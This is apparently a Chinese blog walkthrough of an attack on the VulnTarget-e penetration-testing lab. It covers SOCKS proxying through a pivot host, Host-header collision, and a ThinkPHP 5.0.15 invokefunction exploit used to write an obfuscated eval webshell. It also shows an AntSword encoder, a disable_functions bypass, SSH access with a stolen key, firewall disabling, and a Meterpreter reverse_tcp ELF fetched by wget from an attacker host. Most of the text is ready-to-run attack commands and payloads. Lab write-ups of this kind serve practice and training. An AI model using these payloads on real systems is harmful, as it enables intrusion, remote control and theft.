0x01 前言
宝子们现在只对常读和星标的公众号才展示大图推送,建议大家把李白你好“设为星标”,否则可能就看不到了啦!
0x01 前言
内网代理
HOST碰撞攻击
函数绕过
MSF上线
0x02 一级代理
upload /home/z4pts/桌面/ew.exe C:\\Users\\Administrator\\
C:\Users\Administrator\ew.exe -s ssocksd -l 8090
vi /etc/proxychains4.conf
socks5 192.168.1.5 8090
proxychains curl http://myip.ipip.net/ //开玩笑
proxychains nmap -Pn -T4 -sT -p- 192.168.100.131
22/80/8888
http://192.168.100.131:80/
http://192.168.100.131:8888/
python3 dirsearch.py -u http://192.168.100.131/ --proxy socks5://192.168.1.5:8090
run post/windows/gather/forensics/browser_history
/root/.msf4/local/Administrator_Firefox_mpf91asw.default-release_places.sqlite
mv /root/.msf4/....sqlite /home/z4pts/桌面
选中文件右键--》用"SQLite database browser"打开 执行以下命令
SELECT url FROM moz_places
0x03 Host头碰撞
http://192.168.100.131/vulntarget/thinkphp
http://192.168.100.131/vulntarget/public/index.php
步骤六:下载以下项目并将获取的域名放到host.txt并将IP地址放到ip.txt中执行以下程序进行HOST碰撞
项目地址
https://github.com/fofapro/Hosts_scan
执行命令
proxychains python3 IP_hosts_scan_multithreading.py
执行结果
192.168.100.131 --》 http://www.cJO6w10YLS.com
步骤七:在火狐浏览器上安装 Modheader 插件修改host头信息并再次访问其80端口如下页面
修改字段
Host --》 www.cJO6w10YLS.com
步骤八:以上访问记录中存在TP框架再次访问报错页面显示其版本号,尝试POC执行命令均被禁用拦截.....
http://192.168.100.131/vulntarget/public/index.php?s=1 //报错信息:V5.0.15
#POC
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami //system函数被禁用
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=sassert&vars[1][]=phpinfo() //被BTWAF拦截
0x04 Getshell
步骤九:尝试使用file_put_contents函数写文件且成功!直接GetShell...
#file_put_contents写文件
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=1.php&vars[1][1]=<?php $url = "php";$p ="info();";$c=$url.$p;assert($c);?> //无权限
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=../../123.php&vars[1][1]=<?php $url = "php";$p ="info();";$c=$url.$p;assert($c);?>
#GetShell
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=../../url.php&vars[1][1]=<?php%20eval(urldecode(urldecode(urldecode($_REQUEST[cmd]))));?>
#WebShell
http://192.168.100.131/url.php
步骤十:使用蚁剑连接配置代理并编写编码规则(因为以上POC是经过了3次URL解码,所需对攻击代码进行三次编码)且加入Host信息测试连接...成功!
#编码配置
AntSword-->编码设置-->编码管理-->新建编码器-->PHP-->在创建编码器命名为url-->点击编辑-->将以下代码贴入替换并保存!
#编码内容
'use strict';
// ########## 请在下方编写你自己的代码 ###################
function forceEncode(s) {
return Array.from(s).map(i=>'%'+i.charCodeAt(0).toString(16).padStart(2,'0')).join('')
}
module.exports = (pwd, data, ext={}) => {
const payload = data['_']
data[pwd] = forceEncode(forceEncode(payload));
delete data['_'];
console.log(data);
return data;
}
0x05 绕过disable_function
#项目地址
https://github.com/devil8123665/exploits/blob/master/php7-gc-bypass/exploit.php
在蚁剑中创建by.php并将以上项目文件的项目代码保存在浏览器访问...
#访问地址
http://192.168.100.131/by.php
#私钥文件
/home/vulntarget/key
#连接命令
proxychains ssh -i key 192.168.100.131
id --》 UID:0
whoami --》root
ping www.baidu.com --》不出网
ifconfig --》 192.168.100.0/24 192.168.88.100/24
arp -a --》 192.168.88.102主机信息
ufw disable --》关闭防火墙,不然无法与边界主机进行正常通信!!!
iptables -L --》查看防火墙规则
0x06 上线MSF
#边界主机
Import-Module .\Ladon.ps1
ladon web 3333 dir
C:\Windows\System32\WindowsPowerShell\v1.0\
#生成后门
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.100.155 LPORT=3333 -f elf > shell.elf
#开启监听
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.100.155
set lport 3333
run
#下载执行
wget http://192.168.100.155:3333/shell.elf -O shell.elf
#scp传递执行
proxychains scp -r -i key /home/z4pts/桌面/shell.elf [email protected]:/www/wwwroot/vulntarget-e2/1.elf
#添加路由
use post/multi/manage/autoroute
set session 2
run
iptables -A INPUT -j ACCEPT
iptables -A OUTPUT -j ACCEPT
0x07 往期精彩
VulnTarget-e边界主机权限获取【一】
记一次针对某高校的渗透测试